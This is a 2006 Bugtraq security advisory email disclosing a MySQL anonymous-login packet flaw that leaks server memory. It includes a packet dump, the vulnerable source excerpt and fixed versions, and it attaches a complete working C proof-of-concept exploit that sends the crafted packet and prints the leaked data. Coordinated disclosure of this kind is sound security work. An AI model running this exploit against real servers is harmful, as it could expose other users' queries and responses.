206.231.27])
by mail3b2.westend.com (Postfix) with ESMTP id 84D4C12128F
for <ch@westend.com>; Tue, 2 May 2006 20:51:10 +0200 (CEST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mail3a2.westend.com [212.117.79.67]) with ESMTP; T=
ue, 2 May 2006 11:24:59 -0700
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.=
231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id C286A237011; Tue, 2 May 2006 09:25:10 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Received: (qmail 5226 invoked from network); 2 May 2006 13:30:09 -0000
Subject: [bugtraq] MySQL Anonymous Login Handshake - Information Leakage.
From: Stefano Di Paola <stefano.dipaola@wisec.it>
To: Bugtraq <bugtraq@securityfocus.com>,
vulnwatch <vulnwatch@vulnwatch.org>
Date: Tue, 02 May 2006 15:40:02 +0200
Message-Id: <1146577202.5679.216.camel@first>
X-Mailer: Evolution 2.0.1-1mdk=20
X-Spam-Rating: smtp2.aruba.it 1.6.2 0/1000/N
Resent-From: ch@westend.com
Resent-Date: Wed, 3 May 2006 09:58:45 +0200
Resent-To: ch@lathspell.de
Resent-Message-Id: <20060503075845.9E218BF87@mail3b1.westend.com>
X-Spam-Status: No, hits=3D-97.8 tagged_above=3D-999.0 required=3D5.0 tests=
=3DAWL,
DCC_CHECK, DNS_FROM_RFC_POST, SPF_HELO_PASS, USER_IN_WHITELIST
X-Spam-Level:=20
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary=3D"=3D-CAFKjGLMUFoYmJQtCHl1"
--=3D-CAFKjGLMUFoYmJQtCHl1
Content-Type: text/plain
Content-Transfer-Encoding: binary
~.oOOo. Anonymous Login Handshake .oOOo.~
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
MySQL Server (<=3D 4.1.18, 5.0.20 ) has an information=20
leakage in the way mysql parses login packets on anonymous=20
users (blank password).
Author: Stefano Di Paola
Vulnerable: Mysql <=3D 4.1.18, 5.0.20
Type of Vulnerability: Local/Remote - input validation - Information
Leakage
Tested On : Debian 3.1 - IA32.
Vendor Status: Notified on April, 25th 2006, Confirmed on April, 26th
2006, New versions released on 2nd May 2006.
Fixed: Update to 4.0.27, 4.1.19, 5.0.21, 5.1.10 versions.
A Proof of Concept is Attached for this issue.
Tested on: Debian 3.1 - IA32.
A little Note:
To take advantage of these flaws an attacker should have direct access
to MySQL server communication layer (port 3306 or unix socket).
But if used in conjuction with some web application flaws=20
(i.e. php code injection) an attacker could use socket programming
(i.e. php sockets) to gain access to that layer.
-- Description
By crafting a specifically malformed login packet, initial db name is
filled with uninitialized memory content.
Let's suppose MySql Server has anonymous access.
Infact, if we want to use 'wisecdb' database as user 'wisec' and
password 's' a normal client would send a packet like this:
---------------------------------------------------------------
43 00 00 01 0d a6 03 00 00 00 00 01 08 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 77 69 73 65 63 00 14 aa 69 23 07 2a
ff 99 61 a3 c4 5f 04 66 3b 32 ef a1 f2 b6 59 77
69 73 65 63 64 62 00
C . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . .
. . . . w i s e c . . . i # . *
. . a . . _ . f ; 2 . . . . Y w
i s e c d b .
---------------------------------------------------------------
but if we look at the code (MySQL <=3D 5.0.20)
on sql_parse.cc line ~ 993
function check_connection(THD *thd):
-- =20
char *user=3D end;
char *passwd=3D strend(user)+1;
char *db=3D passwd;
char db_buff[NAME_LEN+1]; // buffer to store db in
utf8
char user_buff[USERNAME_LENGTH+1]; // buffer to store user
in utf8
uint dummy_errors;
uint passwd_len=3D thd->client_capabilities & CLIENT_SECURE_CONNECTION ?
*passwd++ : strlen(passwd);
db=3D thd->client_capabilities & CLIENT_CONNECT_WITH_DB ?
db + passwd_len + 1 : 0;
[1]
/* Since 4.1 all database names are stored in utf8 */
if (db)
{
db_buff[copy_and_convert(db_buff, sizeof(db_buff)-1,
system_charset_info,
db, strlen(db),
thd->charset(), &dummy_errors)]=3D 0;
db=3D db_buff;
}
=20
--
It can be noticed a check for packet construction is missing here[1].
Just replace the null byte at the end of username=20
'wisec\0' with any other byte like this 'wisec0'.
What happens?
user is assigned to some part of the packet content, and db is assigned
with some (internal) memory beyond packet_length.
so if we send a specifical packet we'll get an error message like this:=20
Access denied for user ''@localhost to database 'lqt'
By changing packet lenght (db length) and with a little bit of luck a
malicious user could get sensitive informations such as parts of queries
and or response executed by some previously logged user.
-
The fix:
bugs are fixed in 4.0.27, 4.1.19, 5.0.21, 5.1.10.
You can download them on http://dev.mysql.com/downloads/
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
=3D=3DAnonymous packet information leakage poc :=20
my_anon_db_leak.c
Compile with:
gcc my_anon_db_leak.c -o my_anon_db_leak
=20
usage:
my_anon_db_leak [-s path/to/socket] [-h hostname_or_ip]
[-p port_num] [-n db_len]
Example=20
$ my_anon_db_leak -s /tmp/mysql.sock -n 20
Regards,
Stefano
--=20
......---oOOo--------oOOo---......
Stefano Di Paola
Software Engineer
Email: stefano.dipaola_at_wisec.it
Email: stefano.dipaola1_at_tin.it
Web: www.wisec.it
..................................
--=3D-CAFKjGLMUFoYmJQtCHl1
Content-Type: text/x-csrc; charset=3DISO-8859-15; name=3Dmy_anon_db_leak.c
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=3Dmy_anon_db_leak.c
/* ****************************************************************
=20
April 21.st 2006
=20
my_anon_db_leak.c
MySql Anonimous Login Memory Leak=20
=20
MySql <=3D 5.0.20
=20
MySql <=3D 4.1.x
=20
copyright 2006 Stefano Di Paola (stefano.dipaola_at_wisec.it)
=20
GPL 2.0
****************************************************************
=20
Disclaimer:
In no event shall the author be liable for any damages=20
whatsoever arising out of or in connection with the use=20
or spread of this information.=20
Any use of this information is at the user's own risk.
=20
****************************************************************
Compile with:
gcc my_anon_db_leak.c -o my_anon_db_leak
=20
usage:
my_anon_db_leak [-s path/to/socket] [-h hostname_or_ip] [-p port_num] [-n=
db_len]
=20
=20
*/
#include <sys/types.h>
/* we need MSG_WAITALL - that's why this ugly #ifdef, why doesn't glibc2
have MSG_WAITALL in its <socketbits.h> ??
*/
#ifdef __linux__
#include <linux/socket.h>
#else
#include <sys/socket.h>
#endif
#include <sys/socket.h>
#include <sys/un.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/file.h>
#include <errno.h>
#include <unistd.h>
#include <netinet/in.h> /* sockaddr_in{} and other Internet defns */
#include <netdb.h> /* needed by gethostbyname */
#include <arpa/inet.h> /* needed by inet_ntoa */
char anon_pckt[] =3D {
0x3d, 0x00, 0x00, 0x01, 0x0d, 0xa6, 0x03, 0x00, 0x00, 0x00, 0x00, 0x01, 0=
x08, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0=
x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x14, 0x99, 0=
xdb, 0x54, 0xb6, 0x6a,
0xd7, 0xc2, 0x86, 0x4c, 0x50, 0xa8, 0x14, 0xfe, 0x2e, 0x98, 0x27, 0x72, 0=
x0d, 0xad, 0x45, 0x73,
0x00
}; // len=3D16*4+1=3D65;
int anon_pckt_len =3D 65;
#define USOCK "/tmp/mysql2.sock"
int
tcp_conn (char *hostname, int port)
{
int sockfd;
int n;
struct sockaddr_in servaddr;
struct hostent *hp;
if ((hp =3D gethostbyname (hostname)) =3D=3D 0)
{
perror ("gethostbyname");
exit (0);
}
if ((sockfd =3D socket (AF_INET, SOCK_STREAM, 0)) < 0)
{
perror ("socket");
exit (1);
}
bzero ((char *) &servaddr, sizeof (servaddr));
servaddr.sin_family =3D AF_INET;
servaddr.sin_port =3D htons (port);
memcpy (&servaddr.sin_addr, hp->h_addr, hp->h_length);
if (servaddr.sin_addr.s_addr <=3D 0)
{
perror ("bad address after gethostbyname");
exit (1);
}
if (connect (sockfd, (struct sockaddr *) &servaddr, sizeof (servaddr)) < =
0)
{
perror ("connect");
exit (1);
}
return sockfd;
}
int
unix_conn (char *path)
{
int fd, len;
struct sockaddr_un sa;
fd =3D socket (PF_UNIX, SOCK_STREAM, 0);
if (fd < 0)
{
perror ("cli: socket(PF_UNIX,SOCK_STREAM)");
exit (1);
}
sa.sun_family =3D AF_UNIX;
strcpy (sa.sun_path, path);
len =3D sizeof (sa);
if (connect (fd, (struct sockaddr *) &sa, len) < 0)
{
perror ("cli: connect()");
exit (1);
}
return fd;
}
int
main (int argc, char *argv[])
{
int fd;
int i, ret;
char packet[65535];
char *path;
char *host;
int port =3D 3306;
char buf[65535];
int db_len =3D 0;
int pckt_len =3D anon_pckt_len;
int unix_sock =3D 1;
char c;
path =3D strdup (USOCK);
host =3D strdup ("127.0.0.1");
opterr =3D 0;
while ((c =3D getopt (argc, argv, "s:h:p:n:")) !=3D -1)
switch (c)
{
case 's':
path =3D strdup (optarg);
unix_sock =3D 1;
break;
case 'h':
host =3D strdup (optarg);
unix_sock =3D 0;
break;
case 'p':
port =3D atoi (optarg);
unix_sock =3D 0;
break;
case 'n':
db_len =3D atoi (optarg);
break;
default:
break;
}
bzero (packet, 65535);
pckt_len =3D anon_pckt_len + db_len;
printf ("%d\n", pckt_len);
for (i =3D 0; i < pckt_len; i++)
packet[i] =3D anon_pckt[i];
if (db_len)
for (i =3D anon_pckt_len - 2; i < pckt_len; i++)
packet[i] =3D 'A';
packet[pckt_len - 1] =3D '\0';
packet[0] =3D (char) (anon_pckt[0] + db_len) & 0xff;
packet[1] =3D (char) ((anon_pckt[0] + db_len) >> 8) & 0xff;
for (i =3D 0; i < pckt_len; i++)
printf (" %.2x%c", (unsigned char) packet[i],
((i + 1) % 16 ? ' ' : '\n'));
printf ("\n");
if (unix_sock)
fd =3D unix_conn (path);
else
fd =3D tcp_conn (host, port);
sleep (1);
ret =3D recv (fd, buf, 65535, 0);
if (send (fd, packet, pckt_len, 0) !=3D pckt_len)
{
perror ("cli: send(anon_pckt)");
exit (1);
}
ret =3D recv (fd, buf, 65535, 0);
for (i =3D 0; i < ret; i++)
printf ("%c", (isalpha (buf[i]) ? buf[i] : '.'));
printf ("\n");
return 0;
}
--=3D-CAFKjGLMUFoYmJQtCHl1--